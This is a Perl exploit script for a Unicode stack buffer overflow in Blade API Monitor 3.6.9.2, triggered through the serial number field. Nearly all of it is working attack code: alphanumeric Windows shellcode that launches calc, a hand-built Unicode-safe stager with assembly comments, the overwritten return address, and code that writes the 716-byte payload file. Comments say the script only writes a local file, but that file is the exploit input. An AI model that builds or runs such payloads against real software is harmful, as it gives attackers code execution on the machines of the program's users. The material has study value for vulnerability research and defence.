Blade API Monitor 3.6.9.2 Unicode Stack Buffer Overflow
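# Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!)
# Date: 25/12/2011
# Author: FullMetalFouad
# Version: 3.6.9.2
# Tested on: Windows XP/7
################################################################
#
# This script only concatenates byte strings and writes them to one local
# file, bof_blade.txt (716 bytes).  It executes nothing and opens no network
# connection; the file is the "serial number" input the title refers to.
#
# Layout of the written file, in order:
#   $shellcode_calc   178 bytes  alphanumeric (ALPHA3, eax-relative) payload
#   $junk1            112 bytes  filler: 104 x 0xCC, 2 x 0x35 (ECX), 6 x 0x41 (EBP)
#   $eip                2 bytes  0x3e 0x43 -> 0x0043003e once Unicode-expanded
#   $junk2             20 bytes  filler (0x42)
#   $finder            78 bytes  Unicode-safe stager ($part0 . $part1 . $part2 . $part3)
#   $shellcode         72 bytes  alphanumeric loader that prepares $shellcode_calc
#   0xFF x 4, then 246 x 0x41 ($buffer), then 0x43 x 4
#
# Changes from the original listing: `use strict`/`use warnings`, a three-arg
# open on a lexical handle with error checking, binmode on the output handle,
# and a checked close.  The bytes written are unchanged.
use strict;
use warnings;

my $file = "bof_blade.txt";

# windows/Winexec - 178 bytes
# VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\calc.txt" --verbose
my $shellcode_calc =
    "hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J"
  . "0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I"
  . "2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W"
  . "0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p"
  . "034r032m334t3w3m02";

# First stage to prepare the $shellcode_calc execution:
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\shellcode.txt" --verbose
#   "\x05\xF6\xFC\xFF\xFF" ;# sub eax, 30A
#   "\x33\xDB"             ;# xor ebx,ebx
#   "\x33\xC9"             ;# xor ecx,ecx
#   "\xFE\xC5"             ;# inc ch
#   "\x43"                 ;# inc ebx
#   "\x8A\x14\x58"         ;# mov dl, [eax+ebx*2]
#   "\x88\x14\x18"         ;# mov [eax+ebx], dl
#   "\xE2\xF7"             ;# loop
#   "\xFF\xE0"             ;# jmp eax
my $shellcode =
    "hffffk4diFkTpk02Tpl0T0Bu"
  . "EE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0m";

my $junk1 = "\xCC" x 104;
$junk1 .= "\x35" x 2;    # ECX
$junk1 .= "\x41" x 6;    # EBP

# 0x0043003e : call ebx | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ}
# [BladeAPIMonitor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False,
# v3.6.9.2 (C:\Program Files\BladeAPIMonitor\BladeAPIMonitor.exe)
my $eip = "\x3e\x43";

my $junk2  = "\x42" x 20;
my $buffer = "\x41" x 246;

# Part 0: EAX = EBX + length(part0+part1+part2 +1), to point to the first
# null byte of the loop code.  Each "\x45" is the author's Unicode nop
# (00 45 00 -> add [ebp+0x0],al), inserted so the expanded bytes stay aligned.
my $part0 = '';
$part0 .= "\x53";          # 53          push ebx
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\xBA\x58\x58";  # BA00580058  mov edx, 58005800
$part0 .= "\x45";          # 004500      add [ebp+0x0],al
$part0 .= "\x54";          # 54          push esp
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\x5F";          # 5F          pop edi
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\xB9\x3B\x3B";  # B9003B003B  mov ecx, 3B003B00 (diff)
$part0 .= "\xF5";          # 00F5        add ch,dh
$part0 .= "\x6F";          # 006F00      add [edi+0x0],ch
$part0 .= "\xD6";          # D6          salc
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\x5B";          # 5B          pop ebx
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\x50";          # 50          push eax
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\x54";          # 54          push esp
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\x58";          # 58          pop eax
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\xC1\x19";      # C10019      rol dword ptr [eax], 19
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\x58";          # 58          pop eax
$part0 .= "\xC7";          # 00C7        add bh,al
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\x53";          # 53          push ebx
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\x58";          # 58          pop eax
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part0 .= "\x52";          # 52          push edx
$part0 .= "\x45";          # 004500      add [ebp+0x0],al (nop)

# Part 1: EBX = 0x00000000 and ECX = 0x00000100 (approximate size of buffer).
my $part1 = '';
$part1 .= "\x6A";          # 6A00        push dword 0x00000000
$part1 .= "\x6A";          # 6A00        push dword 0x00000000
$part1 .= "\x5B";          # 5B          pop ebx
$part1 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part1 .= "\x59";          # 59          pop ecx
$part1 .= "\x45";          # 004500      add [ebp+0x0],al (nop)
$part1 .= "\xBA\x01\x41";  # BA00010041  mov edx,0x41000100
$part1 .= "\xF5";          # 00F5        add ch,dh

# Part 2: the patching of the 'loop code'.
my $part2 = '';
$part2 .= "\x45";      # 004500   add [ebp+0x0],al
$part2 .= "\x5A";      # 5A       pop edx
$part2 .= "\x45";      # 004500   add [ebp+0x0],al
$part2 .= "\xC6\x32";  # C60032   mov byte [eax],0x32 ; 0x8A-0x58
$part2 .= "\x70";      # 007000   add [eax+0x0],dh
$part2 .= "\x40";      # 40       inc eax
$part2 .= "\x45";      # 004500   add [ebp+0x0],al
$part2 .= "\x40";      # 40       inc eax
$part2 .= "\x70";      # 007000   add [eax+0x0],dh ; 0x58
$part2 .= "\x40";      # 40       inc eax
$part2 .= "\x70";      # 007000   add [eax+0x0],dh ; 0x88 dh=58
$part2 .= "\x40";      # 40       inc eax
$part2 .= "\x45";      # 004500   add [ebp+0x0],al
$part2 .= "\xC6\x14";  # C60014   mov byte [eax],0x14 ; 0x14
$part2 .= "\x45";      # 004500   add [ebp+0x0],al
$part2 .= "\x40";      # 40       inc eax
$part2 .= "\x45";      # 004500   add [ebp+0x0],al
$part2 .= "\x40";      # 40       inc eax
$part2 .= "\x45";      # 004500   add [ebp+0x0],al
$part2 .= "\xC6\xE2";  # C600E2   mov byte [eax],0xE2 ; 0xE2
$part2 .= "\x45";      # 004500   add [ebp+0x0],al
$part2 .= "\x40";      # 40       inc eax
$part2 .= "\x45";      # 004500   add [ebp+0x0],al

# Part 3: the loop code (stuffed with nulls of course).
#   ; eax points to our shellcode
#   ; ebx is 0x00000000
#   ; ecx is 0x00000500 (for example)
# label:
my $part3 = '';
$part3 .= "\x43";      # 43       inc ebx
$part3 .= "\x14";      # 8A1458   mov byte dl,[eax+2*ebx]
$part3 .= "\x30\x18";  # 881418   mov byte [eax+ebx],dl
$part3 .= "\xF7";      # E2F7     loop label

my $finder = $part0 . $part1 . $part2 . $part3;

my $payload = $shellcode_calc . $junk1 . $eip . $junk2 . $finder . $shellcode
            . "\xFF\xFF\xFF\xFF" . $buffer . "\x43\x43\x43\x43";

# Three-arg open on a lexical handle: the original's 2-arg open with an
# interpolated name would let a name beginning with '>', '>>' or '|' change
# the mode, and its failure went unchecked.
open my $fh, '>', $file or die "open $file: $!";
binmode $fh;    # raw bytes; no newline translation on Windows
print {$fh} $payload;
close $fh or die "close $file: $!";    # buffered write errors surface here
print "File Created successfully\n";

# The original listing ended with a raw dump of the produced file as a
# comment; it is omitted here.  The file is 716 bytes.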